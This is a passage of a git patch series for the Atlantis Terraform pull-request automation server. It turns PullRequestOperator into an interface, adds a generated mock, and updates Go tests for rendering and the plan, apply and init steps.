EventParser: eventParser, VCSClient: vcsClient, GithubPullGetter: githubClient, @@ -265,6 +232,35 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { Logger: logger, AllowForkPRs: userConfig.AllowForkPRs, AllowForkPRsFlag: config.AllowForkPRsFlag, + PullRequestOperator: events.PullRequestOperator{ + TerraformExecutor: terraformClient, + DefaultTFVersion: defaultTfVersion, + ParserValidator: &yaml.ParserValidator{}, + ProjectFinder: &events.DefaultProjectFinder{}, + VCSClient: vcsClient, + Workspace: workspace, + ProjectOperator: events.ProjectOperator{ + Locker: projectLocker, + 
LockURLGenerator: router, + InitStepOperator: runtime.InitStepOperator{ + TerraformExecutor: terraformClient, + DefaultTFVersion: defaultTfVersion, + }, + PlanStepOperator: runtime.PlanStepOperator{ + TerraformExecutor: terraformClient, + DefaultTFVersion: defaultTfVersion, + }, + ApplyStepOperator: runtime.ApplyStepOperator{ + TerraformExecutor: terraformClient, + }, + RunStepOperator: runtime.RunStepOperator{}, + ApprovalOperator: runtime.ApprovalOperator{ + VCSClient: vcsClient, + }, + Workspace: workspace, + Webhooks: webhooksManager, + }, + }, } repoWhitelist := &events.RepoWhitelist{ Whitelist: userConfig.RepoWhitelist, From 8ab4857f77bc163db01ccea6bdb154fd33d63ee3 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Fri, 15 Jun 2018 16:16:31 +0100 Subject: [PATCH 22/69] Fix all tests --- server/events/command_handler_test.go | 21 +- server/events/markdown_renderer_test.go | 75 ++++--- .../mocks/mock_pull_request_operator.go | 154 ++++++++++++++ server/events/pull_request_operator.go | 18 +- server/events/pull_request_operator_test.go | 198 ------------------ .../runtime/apply_step_operator_test.go | 83 +++++--- .../events/runtime/init_step_operator_test.go | 10 +- .../events/runtime/plan_step_operater_test.go | 144 ++++++------- server/events/yaml/parser_validator_test.go | 6 +- server/events/yaml/raw/project.go | 13 +- server/events/yaml/raw/project_test.go | 44 +++- server/events_controller_test.go | 94 ++++++--- server/logging/simple_logger.go | 2 - server/server.go | 2 +- 14 files changed, 458 insertions(+), 406 deletions(-) create mode 100644 server/events/mocks/mock_pull_request_operator.go diff --git a/server/events/command_handler_test.go b/server/events/command_handler_test.go index 598ed6e234..65bcf3c6f5 100644 --- a/server/events/command_handler_test.go +++ b/server/events/command_handler_test.go @@ -33,8 +33,7 @@ import ( . 
"github.com/runatlantis/atlantis/testing" ) -var applier *mocks.MockExecutor -var planner *mocks.MockExecutor +var operator *mocks.MockPullRequestOperator var eventParsing *mocks.MockEventParsing var vcsClient *vcsmocks.MockClientProxy var ghStatus *mocks.MockCommitStatusUpdater @@ -46,8 +45,7 @@ var logBytes *bytes.Buffer func setup(t *testing.T) { RegisterMockTestingT(t) - applier = mocks.NewMockExecutor() - planner = mocks.NewMockExecutor() + operator = mocks.NewMockPullRequestOperator() eventParsing = mocks.NewMockEventParsing() ghStatus = mocks.NewMockCommitStatusUpdater() workspaceLocker = mocks.NewMockAtlantisWorkspaceLocker() @@ -58,8 +56,6 @@ func setup(t *testing.T) { logBytes = new(bytes.Buffer) When(logger.Underlying()).ThenReturn(log.New(logBytes, "", 0)) ch = events.CommandHandler{ - PlanExecutor: planner, - ApplyExecutor: applier, VCSClient: vcsClient, CommitStatusUpdater: ghStatus, EventParser: eventParsing, @@ -67,9 +63,10 @@ func setup(t *testing.T) { MarkdownRenderer: &events.MarkdownRenderer{}, GithubPullGetter: githubGetter, GitlabMergeRequestGetter: gitlabGetter, - Logger: logger, - AllowForkPRs: false, - AllowForkPRsFlag: "allow-fork-prs-flag", + Logger: logger, + AllowForkPRs: false, + AllowForkPRsFlag: "allow-fork-prs-flag", + PullRequestOperator: operator, } } @@ -203,9 +200,9 @@ func TestExecuteCommand_FullRun(t *testing.T) { When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) switch c { case events.Plan: - When(planner.Execute(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) + When(operator.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) case events.Apply: - When(applier.Execute(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) + When(operator.ApplyViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) } ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, 
fixtures.Pull.Num, &cmd) @@ -238,7 +235,7 @@ func TestExecuteCommand_ForkPREnabled(t *testing.T) { headRepo.Owner = "forkrepo" When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil) When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) - When(planner.Execute(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) + When(operator.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) ch.ExecuteCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd) diff --git a/server/events/markdown_renderer_test.go b/server/events/markdown_renderer_test.go index 287996ea44..414d300810 100644 --- a/server/events/markdown_renderer_test.go +++ b/server/events/markdown_renderer_test.go @@ -125,9 +125,11 @@ func TestRenderProjectResults(t *testing.T) { TerraformOutput: "terraform-output", LockURL: "lock-url", }, + Workspace: "workspace", + Path: "path", }, }, - "```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n\n", + "Ran Plan in dir: `path` workspace: `workspace`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n\n", }, { "single successful apply", @@ -135,30 +137,34 @@ func TestRenderProjectResults(t *testing.T) { []events.ProjectResult{ { ApplySuccess: "success", + Workspace: "workspace", + Path: "path", }, }, - "```diff\nsuccess\n```\n\n", + "Ran Apply in dir: `path` workspace: `workspace`\n```diff\nsuccess\n```\n\n", }, { "multiple successful plans", events.Plan, []events.ProjectResult{ { - Path: "path", + Workspace: "workspace", + Path: "path", PlanSuccess: &events.PlanSuccess{ TerraformOutput: "terraform-output", LockURL: "lock-url", }, }, { - Path: "path2", + Workspace: "workspace", + Path: "path2", PlanSuccess: &events.PlanSuccess{ TerraformOutput: "terraform-output2", LockURL: "lock-url2", }, }, }, - "Ran Plan in 2 directories:\n * 
`path`\n * `path2`\n\n## path/\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n## path2/\n```diff\nterraform-output2\n```\n\n* To **discard** this plan click [here](lock-url2).\n---\n\n", + "Ran Plan for 2 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n### 2. workspace: `workspace` path: `path2`\n```diff\nterraform-output2\n```\n\n* To **discard** this plan click [here](lock-url2).\n---\n\n", }, { "multiple successful applies", @@ -166,75 +172,87 @@ func TestRenderProjectResults(t *testing.T) { []events.ProjectResult{ { Path: "path", + Workspace: "workspace", ApplySuccess: "success", }, { Path: "path2", + Workspace: "workspace", ApplySuccess: "success2", }, }, - "Ran Apply in 2 directories:\n * `path`\n * `path2`\n\n## path/\n```diff\nsuccess\n```\n---\n## path2/\n```diff\nsuccess2\n```\n---\n\n", + "Ran Apply for 2 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nsuccess\n```\n---\n### 2. 
workspace: `workspace` path: `path2`\n```diff\nsuccess2\n```\n---\n\n", }, { "single errored plan", events.Plan, []events.ProjectResult{ { - Error: errors.New("error"), + Error: errors.New("error"), + Path: "path", + Workspace: "workspace", }, }, - "**Plan Error**\n```\nerror\n```\n\n\n", + "Ran Plan in dir: `path` workspace: `workspace`\n**Plan Error**\n```\nerror\n```\n\n\n", }, { "single failed plan", events.Plan, []events.ProjectResult{ { - Failure: "failure", + Path: "path", + Workspace: "workspace", + Failure: "failure", }, }, - "**Plan Failed**: failure\n\n\n", + "Ran Plan in dir: `path` workspace: `workspace`\n**Plan Failed**: failure\n\n\n", }, { "successful, failed, and errored plan", events.Plan, []events.ProjectResult{ { - Path: "path", + Workspace: "workspace", + Path: "path", PlanSuccess: &events.PlanSuccess{ TerraformOutput: "terraform-output", LockURL: "lock-url", }, }, { - Path: "path2", - Failure: "failure", + Workspace: "workspace", + Path: "path2", + Failure: "failure", }, { - Path: "path3", - Error: errors.New("error"), + Workspace: "workspace", + Path: "path3", + Error: errors.New("error"), }, }, - "Ran Plan in 3 directories:\n * `path`\n * `path2`\n * `path3`\n\n## path/\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n## path2/\n**Plan Failed**: failure\n\n---\n## path3/\n**Plan Error**\n```\nerror\n```\n\n---\n\n", + "Ran Plan for 3 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n1. workspace: `workspace` path: `path3`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n### 2. workspace: `workspace` path: `path2`\n**Plan Failed**: failure\n\n---\n### 3. 
workspace: `workspace` path: `path3`\n**Plan Error**\n```\nerror\n```\n\n---\n\n", }, { "successful, failed, and errored apply", events.Apply, []events.ProjectResult{ { + Workspace: "workspace", Path: "path", ApplySuccess: "success", }, { - Path: "path2", - Failure: "failure", + Workspace: "workspace", + Path: "path2", + Failure: "failure", }, { - Path: "path3", - Error: errors.New("error"), + Workspace: "workspace", + Path: "path3", + Error: errors.New("error"), }, }, - "Ran Apply in 3 directories:\n * `path`\n * `path2`\n * `path3`\n\n## path/\n```diff\nsuccess\n```\n---\n## path2/\n**Apply Failed**: failure\n\n---\n## path3/\n**Apply Error**\n```\nerror\n```\n\n---\n\n", + "Ran Apply for 3 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n1. workspace: `workspace` path: `path3`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nsuccess\n```\n---\n### 2. workspace: `workspace` path: `path2`\n**Apply Failed**: failure\n\n---\n### 3. workspace: `workspace` path: `path3`\n**Apply Error**\n```\nerror\n```\n\n---\n\n", }, } @@ -244,13 +262,14 @@ func TestRenderProjectResults(t *testing.T) { ProjectResults: c.ProjectResults, } for _, verbose := range []bool{true, false} { - t.Log("testing " + c.Description) - s := r.Render(res, c.Command, "log", verbose) - if !verbose { - Equals(t, c.Expected, s) - } else { - Equals(t, c.Expected+"
Log\n

\n\n```\nlog```\n

\n", s) - } + t.Run(c.Description, func(t *testing.T) { + s := r.Render(res, c.Command, "log", verbose) + if !verbose { + Equals(t, c.Expected, s) + } else { + Equals(t, c.Expected+"
Log\n

\n\n```\nlog```\n

\n", s) + } + }) } } } diff --git a/server/events/mocks/mock_pull_request_operator.go b/server/events/mocks/mock_pull_request_operator.go new file mode 100644 index 0000000000..443636863a --- /dev/null +++ b/server/events/mocks/mock_pull_request_operator.go @@ -0,0 +1,154 @@ +// Automatically generated by pegomock. DO NOT EDIT! +// Source: github.com/runatlantis/atlantis/server/events (interfaces: PullRequestOperator) + +package mocks + +import ( + "reflect" + + pegomock "github.com/petergtz/pegomock" + events "github.com/runatlantis/atlantis/server/events" +) + +type MockPullRequestOperator struct { + fail func(message string, callerSkip ...int) +} + +func NewMockPullRequestOperator() *MockPullRequestOperator { + return &MockPullRequestOperator{fail: pegomock.GlobalFailHandler} +} + +func (mock *MockPullRequestOperator) Autoplan(ctx *events.CommandContext) events.CommandResponse { + params := []pegomock.Param{ctx} + result := pegomock.GetGenericMockFrom(mock).Invoke("Autoplan", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()}) + var ret0 events.CommandResponse + if len(result) != 0 { + if result[0] != nil { + ret0 = result[0].(events.CommandResponse) + } + } + return ret0 +} + +func (mock *MockPullRequestOperator) PlanViaComment(ctx *events.CommandContext) events.CommandResponse { + params := []pegomock.Param{ctx} + result := pegomock.GetGenericMockFrom(mock).Invoke("PlanViaComment", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()}) + var ret0 events.CommandResponse + if len(result) != 0 { + if result[0] != nil { + ret0 = result[0].(events.CommandResponse) + } + } + return ret0 +} + +func (mock *MockPullRequestOperator) ApplyViaComment(ctx *events.CommandContext) events.CommandResponse { + params := []pegomock.Param{ctx} + result := pegomock.GetGenericMockFrom(mock).Invoke("ApplyViaComment", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()}) + var ret0 events.CommandResponse + if 
len(result) != 0 { + if result[0] != nil { + ret0 = result[0].(events.CommandResponse) + } + } + return ret0 +} + +func (mock *MockPullRequestOperator) VerifyWasCalledOnce() *VerifierPullRequestOperator { + return &VerifierPullRequestOperator{mock, pegomock.Times(1), nil} +} + +func (mock *MockPullRequestOperator) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierPullRequestOperator { + return &VerifierPullRequestOperator{mock, invocationCountMatcher, nil} +} + +func (mock *MockPullRequestOperator) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierPullRequestOperator { + return &VerifierPullRequestOperator{mock, invocationCountMatcher, inOrderContext} +} + +type VerifierPullRequestOperator struct { + mock *MockPullRequestOperator + invocationCountMatcher pegomock.Matcher + inOrderContext *pegomock.InOrderContext +} + +func (verifier *VerifierPullRequestOperator) Autoplan(ctx *events.CommandContext) *PullRequestOperator_Autoplan_OngoingVerification { + params := []pegomock.Param{ctx} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Autoplan", params) + return &PullRequestOperator_Autoplan_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type PullRequestOperator_Autoplan_OngoingVerification struct { + mock *MockPullRequestOperator + methodInvocations []pegomock.MethodInvocation +} + +func (c *PullRequestOperator_Autoplan_OngoingVerification) GetCapturedArguments() *events.CommandContext { + ctx := c.GetAllCapturedArguments() + return ctx[len(ctx)-1] +} + +func (c *PullRequestOperator_Autoplan_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]*events.CommandContext, len(params[0])) + for u, param := range 
params[0] { + _param0[u] = param.(*events.CommandContext) + } + } + return +} + +func (verifier *VerifierPullRequestOperator) PlanViaComment(ctx *events.CommandContext) *PullRequestOperator_PlanViaComment_OngoingVerification { + params := []pegomock.Param{ctx} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "PlanViaComment", params) + return &PullRequestOperator_PlanViaComment_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type PullRequestOperator_PlanViaComment_OngoingVerification struct { + mock *MockPullRequestOperator + methodInvocations []pegomock.MethodInvocation +} + +func (c *PullRequestOperator_PlanViaComment_OngoingVerification) GetCapturedArguments() *events.CommandContext { + ctx := c.GetAllCapturedArguments() + return ctx[len(ctx)-1] +} + +func (c *PullRequestOperator_PlanViaComment_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]*events.CommandContext, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(*events.CommandContext) + } + } + return +} + +func (verifier *VerifierPullRequestOperator) ApplyViaComment(ctx *events.CommandContext) *PullRequestOperator_ApplyViaComment_OngoingVerification { + params := []pegomock.Param{ctx} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ApplyViaComment", params) + return &PullRequestOperator_ApplyViaComment_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type PullRequestOperator_ApplyViaComment_OngoingVerification struct { + mock *MockPullRequestOperator + methodInvocations []pegomock.MethodInvocation +} + +func (c *PullRequestOperator_ApplyViaComment_OngoingVerification) 
GetCapturedArguments() *events.CommandContext { + ctx := c.GetAllCapturedArguments() + return ctx[len(ctx)-1] +} + +func (c *PullRequestOperator_ApplyViaComment_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]*events.CommandContext, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(*events.CommandContext) + } + } + return +} diff --git a/server/events/pull_request_operator.go b/server/events/pull_request_operator.go index 61218e902f..b393fb5b75 100644 --- a/server/events/pull_request_operator.go +++ b/server/events/pull_request_operator.go @@ -12,7 +12,15 @@ import ( "github.com/runatlantis/atlantis/server/logging" ) -type PullRequestOperator struct { +//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_pull_request_operator.go PullRequestOperator + +type PullRequestOperator interface { + Autoplan(ctx *CommandContext) CommandResponse + PlanViaComment(ctx *CommandContext) CommandResponse + ApplyViaComment(ctx *CommandContext) CommandResponse +} + +type DefaultPullRequestOperator struct { TerraformExecutor TerraformExec DefaultTFVersion *version.Version ParserValidator *yaml.ParserValidator @@ -26,7 +34,7 @@ type TerraformExec interface { RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) } -func (p *PullRequestOperator) Autoplan(ctx *CommandContext) CommandResponse { +func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandResponse { // check out repo to parse atlantis.yaml // this will check out the repo to a * dir repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace) @@ -99,7 +107,7 @@ func (p *PullRequestOperator) Autoplan(ctx *CommandContext) CommandResponse { return 
CommandResponse{ProjectResults: results} } -func (p *PullRequestOperator) PlanViaComment(ctx *CommandContext) CommandResponse { +func (p *DefaultPullRequestOperator) PlanViaComment(ctx *CommandContext) CommandResponse { repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace) if err != nil { return CommandResponse{Error: err} @@ -141,7 +149,7 @@ func (p *PullRequestOperator) PlanViaComment(ctx *CommandContext) CommandRespons } } -func (p *PullRequestOperator) ApplyViaComment(ctx *CommandContext) CommandResponse { +func (p *DefaultPullRequestOperator) ApplyViaComment(ctx *CommandContext) CommandResponse { repoDir, err := p.Workspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, ctx.Command.Workspace) if err != nil { return CommandResponse{Failure: "No workspace found. Did you run plan?"} @@ -185,7 +193,7 @@ func (p *PullRequestOperator) ApplyViaComment(ctx *CommandContext) CommandRespon // matchingProjects returns the list of projects whose WhenModified fields match // any of the modifiedFiles. -func (p *PullRequestOperator) matchingProjects(modifiedFiles []string, config valid.Spec) []valid.Project { +func (p *DefaultPullRequestOperator) matchingProjects(modifiedFiles []string, config valid.Spec) []valid.Project { //todo // match the modified files against the config // remember the modified_files paths are relative to the project paths diff --git a/server/events/pull_request_operator_test.go b/server/events/pull_request_operator_test.go index 4bbdfd14b5..79457f0dd2 100644 --- a/server/events/pull_request_operator_test.go +++ b/server/events/pull_request_operator_test.go @@ -1,199 +1 @@ package events_test - -import ( - "io/ioutil" - "path/filepath" - "testing" - - "github.com/hashicorp/go-version" - "github.com/runatlantis/atlantis/server/events" - "github.com/runatlantis/atlantis/server/events/runtime" - "github.com/runatlantis/atlantis/server/logging" - . 
"github.com/runatlantis/atlantis/testing" -) - -// When there is no config file, should use the defaults. -func TestBuildStage_NoConfigFile(t *testing.T) { - var defaultTFVersion *version.Version - var terraformExecutor runtime.TerraformExec - e := events.PullRequestOperator{ - DefaultTFVersion: defaultTFVersion, - TerraformExecutor: terraformExecutor, - } - - log := logging.NewNoopLogger() - repoDir := "/willnotexist" - workspace := "myworkspace" - relProjectPath := "mydir" - var extraCommentArgs []string - username := "myuser" - meta := runtime.StepMeta{ - Log: log, - Workspace: workspace, - AbsolutePath: filepath.Join(repoDir, relProjectPath), - DirRelativeToRepoRoot: relProjectPath, - TerraformVersion: defaultTFVersion, - TerraformExecutor: terraformExecutor, - ExtraCommentArgs: extraCommentArgs, - Username: username, - } - - // Test the plan stage first. - t.Run("plan stage", func(t *testing.T) { - planStage, err := e.BuildPlanStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - Ok(t, err) - Equals(t, runtime.PlanStage{ - Steps: []runtime.Step{ - &runtime.InitStep{ - Meta: meta, - }, - &runtime.PlanStep{ - Meta: meta, - }, - }, - }, planStage) - }) - - // Then the apply stage. - t.Run("apply stage", func(t *testing.T) { - applyStage, err := e.BuildApplyStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - Ok(t, err) - Equals(t, runtime.ApplyStage{ - Steps: []runtime.Step{ - &runtime.ApplyStep{ - Meta: meta, - }, - }, - }, *applyStage) - }) -} - -func TestBuildStage(t *testing.T) { - var defaultTFVersion *version.Version - var terraformExecutor runtime.TerraformExec - e := events.PullRequestOperator{ - DefaultTFVersion: defaultTFVersion, - TerraformExecutor: terraformExecutor, - } - - // Write atlantis.yaml config. - tmpDir, cleanup := TempDir(t) - defer cleanup() - err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(` -version: 2 -projects: -- dir: "." 
- workflow: custom -workflows: - custom: - plan: - steps: - - init: - extra_args: [arg1, arg2] - - plan - - run: echo hi - apply: - steps: - - run: prerun - - apply: - extra_args: [arg3, arg4] - - run: postrun -`), 0644) - Ok(t, err) - - repoDir := tmpDir - log := logging.NewNoopLogger() - workspace := "myworkspace" - // Our config is for '.' so there will be no config for this project. - relProjectPath := "mydir" - var extraCommentArgs []string - username := "myuser" - meta := runtime.StepMeta{ - Log: log, - Workspace: workspace, - AbsolutePath: filepath.Join(repoDir, relProjectPath), - DirRelativeToRepoRoot: relProjectPath, - TerraformVersion: defaultTFVersion, - TerraformExecutor: terraformExecutor, - ExtraCommentArgs: extraCommentArgs, - Username: username, - } - - t.Run("plan stage for project without config", func(t *testing.T) { - // This project isn't listed so it should get the defaults. - planStage, err := e.BuildPlanStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - Ok(t, err) - Equals(t, runtime.PlanStage{ - Steps: []runtime.Step{ - &runtime.InitStep{ - Meta: meta, - }, - &runtime.PlanStep{ - Meta: meta, - }, - }, - }, planStage) - }) - - t.Run("apply stage for project without config", func(t *testing.T) { - // This project isn't listed so it should get the defaults. - applyStage, err := e.BuildApplyStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - Ok(t, err) - Equals(t, runtime.ApplyStage{ - Steps: []runtime.Step{ - &runtime.ApplyStep{ - Meta: meta, - }, - }, - }, *applyStage) - }) - - // Create the meta for the custom project. - customMeta := meta - customMeta.Workspace = "default" - customMeta.DirRelativeToRepoRoot = "." 
- customMeta.AbsolutePath = tmpDir - - t.Run("plan stage for custom config", func(t *testing.T) { - planStage, err := e.BuildPlanStage(log, repoDir, "default", ".", extraCommentArgs, username) - Ok(t, err) - - Equals(t, runtime.PlanStage{ - Steps: []runtime.Step{ - &runtime.InitStep{ - Meta: customMeta, - ExtraArgs: []string{"arg1", "arg2"}, - }, - &runtime.PlanStep{ - Meta: customMeta, - }, - &runtime.RunStep{ - Meta: customMeta, - Commands: []string{"echo", "hi"}, - }, - }, - }, planStage) - }) - - t.Run("apply stage for custom config", func(t *testing.T) { - planStage, err := e.BuildApplyStage(log, repoDir, "default", ".", extraCommentArgs, username) - Ok(t, err) - - Equals(t, runtime.ApplyStage{ - Steps: []runtime.Step{ - &runtime.RunStep{ - Meta: customMeta, - Commands: []string{"prerun"}, - }, - &runtime.ApplyStep{ - Meta: customMeta, - ExtraArgs: []string{"arg3", "arg4"}, - }, - &runtime.RunStep{ - Meta: customMeta, - Commands: []string{"postrun"}, - }, - }, - }, *planStage) - }) -} diff --git a/server/events/runtime/apply_step_operator_test.go b/server/events/runtime/apply_step_operator_test.go index 862f5e10e5..1aad3c9e23 100644 --- a/server/events/runtime/apply_step_operator_test.go +++ b/server/events/runtime/apply_step_operator_test.go @@ -8,42 +8,35 @@ import ( "github.com/hashicorp/go-version" . "github.com/petergtz/pegomock" "github.com/runatlantis/atlantis/server/events/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/models" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform/mocks" + "github.com/runatlantis/atlantis/server/events/yaml/valid" . 
"github.com/runatlantis/atlantis/testing" ) func TestRun_NoDir(t *testing.T) { - s := runtime.ApplyStep{ - Meta: runtime.StepMeta{ - Workspace: "workspace", - AbsolutePath: "nonexistent/path", - DirRelativeToRepoRoot: ".", - TerraformVersion: nil, - ExtraCommentArgs: nil, - Username: "username", - }, + o := runtime.ApplyStepOperator{ + TerraformExecutor: nil, } - _, err := s.Run() + _, err := o.Run(models.ProjectCommandContext{ + RepoRelPath: ".", + Workspace: "workspace", + }, nil, "/nonexistent/path") ErrEquals(t, "no plan found at path \".\" and workspace \"workspace\"–did you run plan?", err) } func TestRun_NoPlanFile(t *testing.T) { tmpDir, cleanup := TempDir(t) defer cleanup() - - s := runtime.ApplyStep{ - Meta: runtime.StepMeta{ - Workspace: "workspace", - AbsolutePath: tmpDir, - DirRelativeToRepoRoot: ".", - TerraformVersion: nil, - ExtraCommentArgs: nil, - Username: "username", - }, + o := runtime.ApplyStepOperator{ + TerraformExecutor: nil, } - _, err := s.Run() + _, err := o.Run(models.ProjectCommandContext{ + RepoRelPath: ".", + Workspace: "workspace", + }, nil, tmpDir) ErrEquals(t, "no plan found at path \".\" and workspace \"workspace\"–did you run plan?", err) } @@ -56,24 +49,46 @@ func TestRun_Success(t *testing.T) { RegisterMockTestingT(t) terraform := mocks.NewMockClient() + o := runtime.ApplyStepOperator{ + TerraformExecutor: terraform, + } - tfVersion, _ := version.NewVersion("0.11.4") - s := runtime.ApplyStep{ - Meta: runtime.StepMeta{ - Workspace: "workspace", - AbsolutePath: tmpDir, - DirRelativeToRepoRoot: ".", - TerraformExecutor: terraform, - TerraformVersion: tfVersion, - ExtraCommentArgs: []string{"comment", "args"}, - Username: "username", - }, - ExtraArgs: []string{"extra", "args"}, + When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). 
+ ThenReturn("output", nil) + output, err := o.Run(models.ProjectCommandContext{ + Workspace: "workspace", + RepoRelPath: ".", + CommentArgs: []string{"comment", "args"}, + }, []string{"extra", "args"}, tmpDir) + Ok(t, err) + Equals(t, "output", output) + terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, nil, "workspace") +} + +func TestRun_UsesConfiguredTFVersion(t *testing.T) { + tmpDir, cleanup := TempDir(t) + defer cleanup() + planPath := filepath.Join(tmpDir, "workspace.tfplan") + err := ioutil.WriteFile(planPath, nil, 0644) + Ok(t, err) + + RegisterMockTestingT(t) + terraform := mocks.NewMockClient() + o := runtime.ApplyStepOperator{ + TerraformExecutor: terraform, } + tfVersion, _ := version.NewVersion("0.11.0") When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). ThenReturn("output", nil) - output, err := s.Run() + output, err := o.Run(models.ProjectCommandContext{ + Workspace: "workspace", + RepoRelPath: ".", + CommentArgs: []string{"comment", "args"}, + ProjectConfig: &valid.Project{ + TerraformVersion: tfVersion, + }, + }, []string{"extra", "args"}, tmpDir) Ok(t, err) Equals(t, "output", output) terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, tfVersion, "workspace") diff --git a/server/events/runtime/init_step_operator_test.go b/server/events/runtime/init_step_operator_test.go index 8296394977..efbf4ca283 100644 --- a/server/events/runtime/init_step_operator_test.go +++ b/server/events/runtime/init_step_operator_test.go @@ -3,9 +3,10 @@ package runtime_test import ( "testing" - "github.com/hashicorp/go-version" + version "github.com/hashicorp/go-version" . 
"github.com/petergtz/pegomock" "github.com/runatlantis/atlantis/server/events/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/models" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform/mocks" @@ -45,15 +46,16 @@ func TestRun_UsesGetOrInitForRightVersion(t *testing.T) { logger := logging.NewNoopLogger() iso := runtime.InitStepOperator{ TerraformExecutor: terraform, + DefaultTFVersion: tfVersion, } When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). ThenReturn("output", nil) - output, err := iso.Run(runtime.ProjectCommandContext{ + + output, err := iso.Run(models.ProjectCommandContext{ Log: logger, Workspace: "workspace", - AbsPath: "/path", RepoRelPath: ".", - }, []string{"extra", "args"}) + }, []string{"extra", "args"}, "/path") Ok(t, err) // Shouldn't return output since we don't print init output to PR. Equals(t, "", output) diff --git a/server/events/runtime/plan_step_operater_test.go b/server/events/runtime/plan_step_operater_test.go index 53b45c2e64..bf80927b6d 100644 --- a/server/events/runtime/plan_step_operater_test.go +++ b/server/events/runtime/plan_step_operater_test.go @@ 